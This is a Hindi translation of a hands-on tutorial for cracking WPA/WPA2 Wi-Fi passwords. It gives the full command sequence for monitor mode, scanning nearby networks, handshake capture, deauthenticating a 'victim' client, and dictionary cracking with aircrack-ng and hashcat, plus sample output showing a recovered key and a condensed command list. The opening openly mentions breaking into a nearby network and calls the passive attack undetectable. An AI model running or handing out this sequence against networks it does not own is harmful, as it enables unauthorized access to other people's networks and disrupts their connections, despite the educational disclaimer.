
Airodump-ng और Aircrack-ng/Hashcat के साथ WPA/WPA2 वाई-फाई राउटर को क्रैक करें
WPA/WPA2 वाई-फाई राउटर को Airodump-ng और Aircrack-ng/Hashcat से क्रैक करें।
यह एक संक्षिप्त वॉक-थ्रू ट्यूटोरियल है जो दर्शाता है कि कमजोर पासवर्ड वाले वाई-फाई नेटवर्क को कैसे क्रैक किया जाए। यह विस्तृत नहीं है, लेकिन यह आपके अपने नेटवर्क की सुरक्षा का परीक्षण करने या आस-पास के किसी नेटवर्क में घुसपैठ करने के लिए पर्याप्त जानकारी होनी चाहिए। नीचे बताया गया हमला पूरी तरह से निष्क्रिय है (केवल सुनना, आपके कंप्यूटर से कुछ प्रसारित नहीं होता) और इसका पता लगाना असंभव है, बशर्ते कि आप वास्तव में उस पासवर्ड का उपयोग न करें जिसे आप क्रैक करते हैं। एक वैकल्पिक सक्रिय डीऑथेंटिकेशन हमले का उपयोग टोही प्रक्रिया को तेज करने के लिए किया जा सकता है, जिसका वर्णन इस दस्तावेज़ के अंत में किया गया है।
यदि आप इस प्रक्रिया से परिचित हैं, तो आप विवरण छोड़ सकते हैं और सीधे नीचे उपयोग किए गए कमांड की सूची पर जा सकते हैं। विभिन्न सुझावों और वैकल्पिक तरीकों के लिए, परिशिष्ट देखें। neal1991 और tiiime ने भी कृपया इस दस्तावेज़ और परिशिष्ट का चीनी में अनुवाद प्रदान किया है यदि आप उन संस्करणों को पसंद करते हैं।
अस्वीकरण: यह सॉफ्टवेयर/ट्यूटोरियल केवल शैक्षिक उद्देश्यों के लिए है। इसका उपयोग अवैध गतिविधि के लिए नहीं किया जाना चाहिए। लेखक इसके उपयोग के लिए जिम्मेदार नहीं है। बदमाश मत बनो।
यह ट्यूटोरियल मानता है कि आप:
sudo apt-get install aircrack-ngमॉनिटर मोड का समर्थन करने वाले वायरलेस इंटरफेस को सूचीबद्ध करके शुरू करें:
airmon-ng
यदि आपको कोई इंटरफ़ेस सूचीबद्ध नहीं दिखता है, तो आपका वायरलेस कार्ड मॉनिटर मोड का समर्थन नहीं करता है 😞
हम मान लेंगे कि आपका वायरलेस इंटरफ़ेस नाम wlan0 है, लेकिन यदि यह इससे भिन्न है तो सही नाम का उपयोग करना सुनिश्चित करें। इसके बाद, हम इंटरफ़ेस को मॉनिटर मोड में रखेंगे:
airmon-ng start wlan0
iwconfig चलाएँ। अब आपको एक नया मॉनिटर मोड इंटरफ़ेस सूचीबद्ध दिखना चाहिए (संभवतः mon0 या wlan0mon)।
अपने मॉनिटर इंटरफ़ेस का उपयोग करके आस-पास के वायरलेस राउटर द्वारा प्रसारित 802.11 बीकन फ्रेम को सुनना शुरू करें:
airodump-ng mon0
आपको नीचे दिए गए समान आउटपुट दिखना चाहिए।
CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0>
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro
9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme
00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin's Awesome
06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2
78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2
9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT
BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root
EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca
इस डेमो के प्रयोजनों के लिए, हम अपने नेटवर्क "hackme" का पासवर्ड क्रैक करना चुनेंगे। airodump-ng द्वारा प्रदर्शित BSSID MAC पता और चैनल (CH) संख्या याद रखें, क्योंकि अगले चरण के लिए हमें दोनों की आवश्यकता होगी।
WPA/WPA2 उपकरणों को नेटवर्क से प्रमाणित करने के लिए 4-तरफ़ा हैंडशेक का उपयोग करता है। आपको यह जानने की आवश्यकता नहीं है कि इसका क्या अर्थ है, लेकिन नेटवर्क पासवर्ड क्रैक करने के लिए आपको इनमें से एक हैंडशेक को कैप्चर करना होगा। ये हैंडशेक तब होते हैं जब कोई उपकरण नेटवर्क से कनेक्ट होता है, उदाहरण के लिए, जब आपका पड़ोसी काम से घर लौटता है। हम पिछले कमांड से प्राप्त चैनल और बीएसएसआईडी मानों का उपयोग करके लक्ष्य नेटवर्क पर ट्रैफ़िक की निगरानी के लिए airmon-ng को निर्देशित करके इस हैंडशेक को कैप्चर करते हैं।
# -c और --bssid मानों को अपने लक्ष्य नेटवर्क के मानों से बदलें
# -w उस निर्देशिका को निर्दिष्ट करता है जहाँ हम पैकेट कैप्चर को सहेजेंगे
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
अब हम प्रतीक्षा करते हैं... एक बार जब आप एक हैंडशेक कैप्चर कर लेते हैं, तो आपको स्क्रीन के ऊपरी दाएं भाग में, वर्तमान समय के ठीक दाईं ओर कुछ इस तरह दिखना चाहिए [ WPA handshake: bc:d3:c9:ef:d2:67।
यदि आप अधीर महसूस कर रहे हैं, और सक्रिय हमले का उपयोग करने में सहज हैं, तो आप लक्ष्य नेटवर्क से जुड़े उपकरणों पर दुर्भावनापूर्ण डीऑथेंटिकेशन पैकेट भेजकर उन्हें पुनः कनेक्ट करने के लिए मजबूर कर सकते हैं। इसके परिणामस्वरूप अक्सर 4-तरफ़ा हैंडशेक कैप्चर हो जाता है। इसके बारे में जानकारी के लिए नीचे deauth attack section देखें।
एक बार जब आप एक हैंडशेक कैप्चर कर लेते हैं, तो airodump-ng से बाहर निकलने के लिए ctrl-c दबाएँ। आपको एक .cap फ़ाइल दिखनी चाहिए जहाँ भी आपने airodump-ng को कैप्चर सहेजने के लिए कहा था (संभवतः -01.cap कहा जाता है)। हम नेटवर्क पासवर्ड क्रैक करने के लिए इस कैप्चर फ़ाइल का उपयोग करेंगे। मैं इस फ़ाइल का नाम बदलकर उस नेटवर्क नाम को दर्शाना पसंद करता हूँ जिसे हम क्रैक करने का प्रयास कर रहे हैं:
mv ./-01.cap hackme.cap
अंतिम चरण कैप्चर किए गए हैंडशेक का उपयोग करके पासवर्ड को क्रैक करना है। यदि आपके पास GPU तक पहुंच है, तो मैं पासवर्ड क्रैकिंग के लिए hashcat का उपयोग करने की अत्यधिक अनुशंसा करता हूँ। मैंने एक सरल टूल बनाया है जो hashcat का उपयोग करना बहुत आसान बनाता है जिसे naive-hashcat कहा जाता है। यदि आपके पास GPU तक पहुंच नहीं है, तो विभिन्न ऑनलाइन GPU क्रैकिंग सेवाएं हैं जिनका आप उपयोग कर सकते हैं, जैसे GPUHASH.me या OnlineHashCrack। आप Aircrack-ng के साथ CPU क्रैकिंग में भी अपना हाथ आजमा सकते हैं।
ध्यान दें कि नीचे दोनों हमले के तरीके अपेक्षाकृत कमजोर उपयोगकर्ता-जनित पासवर्ड मानते हैं। अधिकांश WPA/WPA2 राउटर मजबूत 12-अक्षर वाले यादृच्छिक पासवर्ड के साथ आते हैं जिन्हें कई उपयोगकर्ता (ठीक ही) अपरिवर्तित छोड़ देते हैं। यदि आप इनमें से किसी एक पासवर्ड को क्रैक करने का प्रयास कर रहे हैं, तो मैं Probable-Wordlists WPA-length डिक्शनरी फ़ाइलों का उपयोग करने की अनुशंसा करता हूँ।
naive-hashcat के साथ क्रैक करना (अनुशंसित)naive-hashcat का उपयोग करके पासवर्ड क्रैक करने से पहले, हमें अपनी .cap फ़ाइल को समतुल्य हैशकैट फ़ाइल प्रारूप .hccapx में बदलना होगा। आप यह आसानी से .cap फ़ाइल को https://hashcat.net/cap2hccapx/ पर अपलोड करके या सीधे cap2hccapx टूल का उपयोग करके कर सकते हैं।
cap2hccapx.bin hackme.cap hackme.hccapx
इसके बाद, naive-hashcat डाउनलोड करें और चलाएँ:
# डाउनलोड
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat
# 134MB rockyou डिक्शनरी फ़ाइल डाउनलोड करें
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# क्रैक करें ! बेबी ! क्रैक करें !
# 2500 WPA/WPA2 के लिए हैशकैट हैश मोड है
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
Naive-hashcat विभिन्न डिक्शनरी, रूल, कॉम्बिनेशन, और मास्क (स्मार्ट ब्रूट-फोर्स) हमलों का उपयोग करता है और मध्यम-शक्ति वाले पासवर्ड के खिलाफ चलने में दिन या महीने भी लग सकते हैं। क्रैक किया गया पासवर्ड hackme.pot में सहेजा जाएगा, इसलिए समय-समय पर इस फ़ाइल की जाँच करें। एक बार जब आप पासवर्ड क्रैक कर लेते हैं, तो आपको अपने POT_FILE की सामग्री के रूप में कुछ इस तरह दिखना चाहिए:
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
जहाँ : द्वारा अलग किए गए अंतिम दो फ़ील्ड क्रमशः नेटवर्क नाम और पासवर्ड हैं।
यदि आप naive-hashcat के बिना hashcat का उपयोग करना चाहते हैं, तो जानकारी के लिए यह पृष्ठ देखें।
Aircrack-ng का उपयोग आपके CPU पर चलने वाले बहुत ही बुनियादी डिक्शनरी हमलों के लिए किया जा सकता है। हमले को चलाने से पहले आपको एक वर्डलिस्ट की आवश्यकता है। मैं कुख्यात rockyou डिक्शनरी फ़ाइल का उपयोग करने की अनुशंसा करता हूँ:
# 134MB rockyou डिक्शनरी फ़ाइल डाउनलोड करें
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
ध्यान दें, यदि नेटवर्क पासवर्ड वर्डफ़ाइल में नहीं है, तो आप पासवर्ड क्रैक नहीं कर पाएंगे।
# -a2 WPA2 निर्दिष्ट करता है, -b BSSID है, -w वर्डफ़ाइल है
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
यदि पासवर्ड क्रैक हो जाता है, तो आप टर्मिनल में KEY FOUND! संदेश देखेंगे, उसके बाद नेटवर्क पासवर्ड का सादा पाठ संस्करण दिखाई देगा।
Aircrack-ng 1.2 beta3
[00:01:49] 111040 keys tested (1017.96 k/s)
KEY FOUND! [ hacktheplanet ]
Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
डीऑथ हमला आपकी मशीन से उस नेटवर्क से जुड़े क्लाइंट को नकली डीऑथेंटिकेशन पैकेट भेजता है जिसे आप क्रैक करने का प्रयास कर रहे हैं। इन पैकेटों में नकली "प्रेषक" पते शामिल होते हैं जो उन्हें क्लाइंट को ऐसा प्रतीत कराते हैं जैसे कि वे स्वयं एक्सेस प्वाइंट से भेजे गए हों। ऐसे पैकेट प्राप्त होने पर, अधिकांश क्लाइंट नेटवर्क से डिस्कनेक्ट हो जाते हैं और तुरंत पुनः कनेक्ट हो जाते हैं, जिससे आपको यदि आप airodump-ng के साथ सुन रहे हैं तो 4-तरफ़ा हैंडशेक मिल जाता है।
एक विशिष्ट एक्सेस प्वाइंट की निगरानी के लिए airodump-ng का उपयोग करें (-c channel --bssid MAC का उपयोग करके) जब तक आपको कोई क्लाइंट (STATION) कनेक्टेड न दिखे। एक कनेक्टेड क्लाइंट कुछ इस तरह दिखता है, जहाँ 64:BC:0C:48:97:F7 क्लाइंट MAC है।
CH 6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS
BSSID STATION PWR Rate Lost Frames Probe
9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 ASUS
अब, airodump-ng को चालू रखें और एक नया टर्मिनल खोलें। हम अपने पीड़ित क्लाइंट को नकली डीऑथ पैकेट भेजने के लिए aireplay-ng कमांड का उपयोग करेंगे, जिससे वह नेटवर्क से पुनः कनेक्ट होने के लिए मजबूर हो जाएगा और उम्मीद है कि इस प्रक्रिया में एक हैंडशेक प्राप्त हो जाएगा।
# -0 2 निर्दिष्ट करता है कि हम 2 डीऑथ पैकेट भेजना चाहते हैं। यदि आवश्यक हो तो इस संख्या को बढ़ाएँ,
# लेकिन ध्यान रखें कि इससे क्लाइंट नेटवर्क गतिविधि में ध्यान देने योग्य रुकावट आ सकती है
# -a एक्सेस प्वाइंट का MAC है
# -c क्लाइंट का MAC है
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0
आप वैकल्पिक रूप से सभी कनेक्टेड क्लाइंट्स को डीऑथ पैकेट प्रसारित कर सकते हैं:
# हालांकि सभी क्लाइंट प्रसारण डीऑथ का सम्मान नहीं करते हैं
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0
एक बार जब आप डीऑथ पैकेट भेज देते हैं, तो अपने airodump-ng प्रक्रिया पर वापस जाएँ, और सौभाग्य से अब आपको ऊपरी दाएं कोने में कुछ इस तरह दिखना चाहिए: [ WPA handshake: 9C:5C:8E:C9:AB:C0। अब जब आपने एक हैंडशेक कैप्चर कर लिया है, तो आपको नेटवर्क पासवर्ड क्रैक करने के लिए तैयार होना चाहिए।
नीचे WPA/WPA2 नेटवर्क को क्रैक करने के लिए आवश्यक सभी कमांड की सूची क्रम से दी गई है, न्यूनतम स्पष्टीकरण के साथ।
# अपने नेटवर्क डिवाइस को मॉनिटर मोड में डालें
airmon-ng start wlan0
# लक्ष्य BSSID और चैनल प्राप्त करने के लिए सभी आस-पास के बीकन फ्रेम को सुनें
airodump-ng mon0
# हैंडशेक सुनना शुरू करें
airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0
# वैकल्पिक रूप से हैंडशेक को बलपूर्वक प्राप्त करने के लिए किसी कनेक्टेड क्लाइंट को डीऑथ करें
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0
########## aircrack-ng के साथ पासवर्ड क्रैक करें... ##########
# यदि आवश्यक हो तो 134MB rockyou.txt डिक्शनरी फ़ाइल डाउनलोड करें
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# aircrack-ng के साथ क्रैक करें
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap
########## या naive-hashcat के साथ पासवर्ड क्रैक करें ##########
# cap को hccapx में बदलें
cap2hccapx.bin capture/-01.cap capture/-01.hccapx
# naive-hashcat के साथ क्रैक करें
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
इस ट्यूटोरियल की प्रतिक्रिया इतनी शानदार रही कि मैंने समुदाय के सदस्यों से सुझाव और अतिरिक्त सामग्री को परिशिष्ट के रूप में जोड़ा है। यह जानने के लिए इसे देखें कि कैसे:
wlandump-ng के साथ अपने आस-पास के हर नेटवर्क से हैंडशेक कैप्चर करेंcrunch का उपयोग करेंmacchanger के साथ अपने MAC पते को स्पूफ़ करेंपरिशिष्ट का चीनी संस्करण भी उपलब्ध है।
यहाँ प्रस्तुत अधिकांश जानकारी Lewis Encarnacion के शानदार ट्यूटोरियल से ली गई थी। Aircrack-ng और Hashcat पर काम करने वाले शानदार लेखकों और अनुरक्षकों को भी धन्यवाद।
neal1991 और tiiime का इस ट्यूटोरियल का चीनी में अनुवाद करने के लिए अपार धन्यवाद। इसके अलावा yizhiheng, hiteshnayak305, enilfodne, DrinkMoreCodeMore, hivie7510, cprogrammer1994, 0XE4, hartzell, zeeshanu, flennic, bhusang, tversteeg, gpetrousov, crowchirp और Shark0der को भी धन्यवाद जिन्होंने Reddit और GitHub पर सुझाव और टाइपो सुधार प्रदान किए। यदि आप WPA2 के कुछ प्रस्तावित विकल्पों के बारे में सुनने में रुचि रखते हैं, तो इस Hacker News पोस्ट पर कुछ बेहतरीन चर्चा देखें।